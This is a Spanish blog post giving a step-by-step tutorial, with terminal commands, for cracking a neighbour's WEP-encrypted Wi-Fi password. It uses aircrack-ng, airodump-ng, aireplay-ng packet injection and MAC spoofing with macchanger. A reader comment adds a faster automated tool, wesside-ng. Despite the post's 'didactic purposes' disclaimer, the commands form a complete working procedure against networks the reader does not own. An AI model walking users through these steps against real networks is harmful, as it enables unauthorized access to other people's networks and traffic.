LinuxParty

NUESTRO SITIO necesita la publicidad para costear hosting y el dominio. Por favor considera deshabilitar tu AdBlock en nuestro sitio. También puedes hacernos una donación entrando en linuxparty.es, en la columna de la derecha.
Inicio desactivadoInicio desactivadoInicio desactivadoInicio desactivadoInicio desactivado
 
Ustedes saben que regularmente no escribiría sobre esto, ya que se trata de algo que cae en las vías de lo ilegal, sin embargo lo haré por varias razones, para empezar por una campaña sorpresa que empezaremos dentro de poco si logramos conseguir suficiente apoyo y también, por cuestiones de festividades: No todos los días se acaba el año!! :P Así que por eso mismo, lo despediremos con un "regalo" especial y es ésta entrada. Aclaraciones: El contenido de este post tiene fines didácticos, el uso que le des a lo que aquí te enseñemos es tu responsabilidad, recuerda que robar claves WiFi para tener "Internet Gratis" es ilegal y podría acarrearte consecuencias. De igual manera, si quieres evitar ser víctima de este tipo de Hacking, te invitamos a leer este otro post acerca de cómo proteger y aprovechar tu Red al Máximo; Para fines de comodidad, usaré Mandriva como distribución ejemplo, este tutorial puede seguirse usando cualquier distro cambiando los comandos adecuados según corresponda (Más que nada, cambian los comandos para instalación de paquetes)

1.- Preparando el entorno:

- Tener Una terminal con 4 pestañas en Root

Para hacer esto, abrimos una terminal y nos dirigimos a Archivo>Nueva Pestaña, teniendo las 4 pestañas abiertas, nos autenticamos como el Usuario root en las 4 con su - y ENTER nos pedirá nuestra contraseña en cada una, la ponemos y damos ENTER.

- Instalando Software Necesario

Necesitaremos Sólo 3 paquetes: aircrack-ng, macchanger y rfkill. Para instalarlos, corremos:

1
2
3
urpmi aircrack-ng
urpmi macchanger
urpmi rfkill

-Desactivando la Conexión

Para esto, no apagues tu switch y/o adaptador de red, simplemente, desconéctate de cualquier red inalámbrica y/o alámbrica a la que estés conectado y deja el adaptador encendido.

2.- ¡A Trabajar!

(Recuerda tener a la mano tus 4 terminales autenticadas como Root)

Terminal #1:

-Activando el Modo Monitor (Invisible) de nuestra Tarjeta de Red


1
2
3
iwconfig
airmon-ng start wlan0
ifconfig mon0 down

Donde: "wlan0" es el nombre de tu adaptador de red inalámbrico según haya salido con el primer comando y "mon0" se refiere al nombre que recibió el adaptador de red tras activar su Modo Monitor con el segundo comando, puede cambiar según el caso, pero en la mayoría de las PC's manejaremos estos valores ;)

-Cambiando la MAC de la Tarjeta de Red:

Para esto, apagamos el adaptador de red desde su switch en el equipo y corremos:

1
macchanger -m 00:11:22:33:44:55 mon0

Una vez cambiada la MAC, Encendemos el adaptador de red desde su switch en el equipo y corremos:


1
rfkill unblock all

Acto seguido, corremos:


1
ifconfig mon0 up

y si todo ha salido bien, (sin marcar "error" por ningún lado), continuamos con:

1
airodump-ng mon0

Esto iniciará un escaneo de todas las redes a nuestro alcance, dándonos sus "ESSID" (Nombres de la Red) su tipo de cifrado, (Tiene que ser WEP para que nuestro hackeo funcione) canal en que operan y más datos, tras unos segundos, nos encontrará la lista completa, paramos la búsqueda con "Ctrl+C" y abrimos un editor de texto, porque tendremos que editar el siguiente comando:

airodump-ng -c X -w Y --bssid Z mon0

Donde: "X" se refiere al Número de Canal en que Opera la Red a la que atacaremos, (Columna CH de la búsqueda) "Y" se refiere al Nombre de la Red (Columna BSSID o ESSID o SSID según sea el caso de la búsqueda) y "Z" se refiere a la dirección MAC de la Red, terminando la edición, nuestro comando para la consola quedaría así más o menos:

1
airodump-ng -c 6 -w REDelVECINO --bssid 00:3P:8D:6A:A5:98 mon0

Ahí me dispondría a obtener la Clave WEP de la red con el nombre "ReDelVECINO" que opera en el canal 6 y tiene como dirección MAC 00:3P:8D:6A:A5:98. Corremos el Comando con ENTER y con esto hemos acabado en el Terminal #1, NO LO CERRAMOS, simplemente, nos movemos de pestaña y continuamos con el siguiente terminal.

Terminal #2:

-Asociando Nuestra MAC falsa a la Red en Cuestión

Para esto, corremos:

1
aireplay-ng -1 6000 -a Z -h 00:11:22:33:44:55 mon0

Donde "Z" Es la dirección MAC de la red en Cuestión. Si nuestra asociación es Exitosa (Association Successful) Nos dirigimos a la siguiente terminal, si no, revisamos que no hayamos hecho nada mal, y de no ser así, probamos con otra red que esté más cerca o tenga más potencia (recuerden que debe estar encriptada con Cifrado WEP)

Terminal #3:

-¡Atacando al Fin!


Has llegado hasta aquí, felicidades. Es momento de que obtengas tu clave (o casi) ¡Estás muy cerca! corremos un ataque a la red con:


1
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b Z -h 00:11:22:33:44:55 mon0

Donde "Z" es la dirección MAC de la Red en Cuestión; En algún momento, nos dirá que se ha encontrado "un buen paquete" o un paquete útil propiamente dicho. Nos preguntará si queremos usarlo, a lo que responderemos que sí con y y luego ENTER.

-Es momento de esperar

Después de lanzar el ataque, la consola empezará a capturar paquetes y tu podrás ir viendo su progreso, es importante destacar que un número de paquetes razonable para obtener una contraseña WEP son 30,000 o más. Dependiendo de muchas cosas, obtener los paquetes necesarios tardará un poco, así que vayamos con la siguiente terminal mientras.

Terminal #4:

-¡A Pedir la Clave!

El método más rápido para conseguir una clave WEP es irla descifrando al mismo tiempo que obtenemos paquetes, en nuestra cuarta terminal corremos:

1
aircrack-ng -z X*.cap

Donde "X" es el Nombre de la Red que estamos Hackeando. Tras correr este comando, las terminales 3 y 4 trabajarán en conjunto, una irá consiguiendo paquetes para descifrar la clave y la otra la irá descifrando poco a poco, ahora sólo queda esperar... Dependiendo de muchas cosas, el tiempo de obtención de la clave puede variar un poco, nos centramos en el terminal 4 y nos vamos a hacer otras cosas, regresando en al menos 30 minutos. Si tras 30 minutos la terminal #4 no nos muestra la leyenda de KEY FOUND y la clave en formato "XX:XX:XX:XX:XX" Nos esperamos otros 30 minutos, en una Hora como MÁXIMO ya deberíamos tener la clave WEP de la Red en cuestión, quitamos los puntos de entre caracteres y la anotamos en formato "XXXXXXXXXX" Ésa es nuestra preciada clave :D

-Finalizando

En nuestra cuarta terminal tras obtener la clave WEP, corremos: (Como Root)

1
2
airmon-ng stop mon0
iwconfig

Y pues bien, tras reiniciar el equipo nos conectamos a la red deseada con la clave WEP recién obtenida.

Recuerda: 

- Este Tutorial tiene fines meramente didácticos. Lo que hagas con la Información aquí obtenida es TU RESPONSABILIDAD.

- Evita que Hackeen tu Red y Sácale el Máximo Provecho siguiendo Nuestros Consejos

Pin It

Comentarios  

0 # Guest 18-01-2011 04:47
Hola
No habría comentado nada si el titulo fuese otro , pero "en tiempo record"...
Con la ultima versión del aircrack hay una nueva herramienta llamada wesside-ng, que según la propia pag de Aircrack es una herramienta magica para obtener la clave WEP en minutos sin tener que hacer practicamente nada, solo has de poner wesside-ng -i wlan0 y a correr y si te da algún fallo lo corriges poniendo wesside-ng -k 1 -i wlan0.
Por no hablar del Airoscript que también en su ultima y reciente versión ha añadido esta herramienta y ha mejorado muchísimo de tal forma que prácticamente todo el mundo sin conocimientos puede usarlo.
Un saludo y continuar así con la Web
Responder | Responder con una citación | Citar

Escribir un comentario


Código de seguridad
Refescar



Redes:



 

Suscribete / Newsletter

Suscribete a nuestras Newsletter y periódicamente recibirás un resumen de las noticias publicadas.

Donar a LinuxParty

Probablemente te niegues, pero.. ¿Podrías ayudarnos con una donación?


Tutorial de Linux

Filtro por Categorías